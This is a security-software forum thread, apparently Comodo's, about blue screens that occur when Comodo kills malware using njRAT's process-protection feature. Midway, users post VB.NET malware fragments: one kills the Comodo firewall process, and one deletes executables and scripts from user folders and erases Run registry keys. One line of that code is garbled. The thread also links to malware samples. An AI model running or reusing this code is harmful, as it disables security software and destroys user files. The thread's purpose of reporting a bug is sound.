PM sent.
- Disabled Cloud lookup and AV to not get this detected as it was detected by CAV.
- Ran it
- Launched KS and selected the malware process, hit the “kill process” button, no BSOD.
test has been done with Sandbox set to partially limited, Limited, Restricted, Untrusted, Blocked and FV.
I haven’t get any BSOD.
Thanks for testing malware
Possible work "terminate "or “kill process tree " This is not"kill process”
Thanks again for the test
I did the same test with “kill process tree” and “terminate” but did not get any BSOD.
Thanks.
Show the blue screen by option"Protect Process BSOD" in program njrat
http://im33.gulfup.com/PITGc.jpg
I hope that the problem will soon be solved :azn:
:o As I said earlier in this topic, the devs will not be able to replicate this without a Complete Dump from a computer which is affected by this. Therefore, as nobody who is able to create and upload a Complete Dump has been able to replicate the BSOD, there is no reason to assume this issue will be fixed.
Please set your computer to create a Complete Dump. Then replicate the BSOD, upload the Complete Dump, and paste a download link to it in your reply. If you have any questions about how to do this please ask. However, remember that unless they get the Complete Dump there is no reason at all to expect that this will be fixed.
Thank you.
well , we have a problem with comdo killing active malicious softwares like trojan or backdoor >>
when I put some codes like this in my server >> it make killing it impossible >> and the blue screen of death appear >>
like this
On Error Resume Next
For Each p As Process In Process.GetProcessesByName("Process.exe")
p.Kill()
p.Close()
Next
or this
Sub AntiComodo()
Dim ktp As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To ktp.Length - 1
Select Case Strings.LCase(ktp(i).ProcessName)
Case “cpf.exe”
ktp(i).Kill()
Case Else
End Select
Next
End Sub
this is an example and there is a lot of codes cause blue screen of death
and it said for more information search for : critical process
if you want a sample i have one >> i can send it to you if you want >
If you can replicate this, please create a separate bug report for this. The format is given here. Also, set up your computer to create Complete Dumps. Instructiosn on how to do this are provided here. Let me know if you have any questions.
Thank you.
There is no need for a memory dump because it was shred code that causes the blue screen
:o The devs were unable to replicate it from the sample. Thus, they need the Complete Memory Dump. I don’t know how else to explain this.
As this was not fixed during the Beta testing period I will move this bug report to the main Bug Reporting Board.
Please check and see if this is fixed with the newest version (7.0.313494.4115)? Please let us know whether it is fixed or you are still experiencing the problem.
Thank you.
PM sent.
Did not solve the problem >:(
This is a test from a member of the forum zyzoom.net
https://dl.dropboxusercontent.com/s/izicq4psbyueykj/comodo.rar?dl=1&
token_hash=AAH9V4GckRRbhCCzvsQKRlNSGMkbkeQO67U_KOspJQtHFw
Thank you for checking this. I have updated the tracker.
Testing was again on samples of malwaretips and the same result
And also if it was run malware detection and anti-viruses and quarantine the blue screen shows and also if i do block and terminate
Has been testing samples of malwaretips
Okay. At this time I have no new information from the devs. Hopefully this will be fixed within the next few updates.
Thanks.
hi chiron
I found one in the Forum hacker solution
’ Coded By ProMax
Dim SU, AD, TM, UF As String
SU = Environment.GetFolderPath(Environment.SpecialFolder.Startup)
TM = My.Computer.FileSystem.SpecialDirectories.Temp
AD = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)
UF = Mid(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments), 1, Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments).Length - 10)
For Each x As Process In Process.GetProcesses
Try
If IO.Path.GetDirectoryName(x.MainModule.FileName.ToString).ToLower = TM.ToLower Then
Try : x.Kill() : Catch : End Try
ElseIf IO.Path.GetFileName(x.MainModule.FileName.ToString).ToLower = AD.ToLower Then
Try : x.Kill() : Catch : End Try
ElseIf IO.Path.GetFileName(x.MainModule.FileName.ToString).ToLower = UF.ToLower Then
Try : x.Kill() : Catch : End Try
ElseIf IO.Path.GetFileName(x.MainModule.FileName.ToString).ToLower = SU.ToLower Then
Try : x.Kill() : Catch : End Try
End If
Catch : End Try
Next
For Each X In IO.Directory.GetFiles™
If IO.Path.GetExtension(X).ToLower = “.vbs” Then
Try : System.IO.File.Delete(X) : Catch : End Try
End If
If IO.Path.GetExtension(X).ToLower = “.exe” Then
Try : System.IO.File.Delete(X) : Catch : End Try
End If
Next
For Each X In IO.Directory.GetFiles(AD)
If IO.Path.GetExtension(X).ToLower = “.vbs” Then
Try : System.IO.File.Delete(X) : Catch : End Try
End If
If IO.Path.GetExtension(X).ToLower = “.exe” Then
Try : System.IO.File.Delete(X) : Catch : End Try
End If
Next
For Each X In IO.Directory.GetFiles(UF)
If IO.Path.GetExtension(X).ToLower = “.vbs” Then
Try : System.IO.File.Delete(X) : Catch : End Try
End If
If IO.Path.GetExtension(X).ToLower = “.exe” Then
Try : System.IO.File.Delete(X) : Catch : End Try
End If
Next
For Each X In IO.Directory.GetFiles(SU)
If IO.Path.GetExtension(X).ToLower = “.vbs” Then
Try : System.IO.File.Delete(X) : Catch : End Try
End If
If IO.Path.GetFileName(X).Length > 20 Then
Try : System.IO.File.Delete(X) : Catch : End Try
End If
Next
Dim regKey As RegistryKey = My.Computer.Registry.CurrentUser.OpenSubKey(“software\microsoft\windows\currentversion\run”, True)
For Each x As String In regKey.GetValueNames
If x.Length > 15 Then
regKey.DeleteValue(x)
End If
Next
I’m not sure what this is for? Please provide more background information.
Thanks.
Is the currency in software vb.net to delete and kill malware protected BSOD
Such a tool
http://www.gulfup.com/?eVEtGk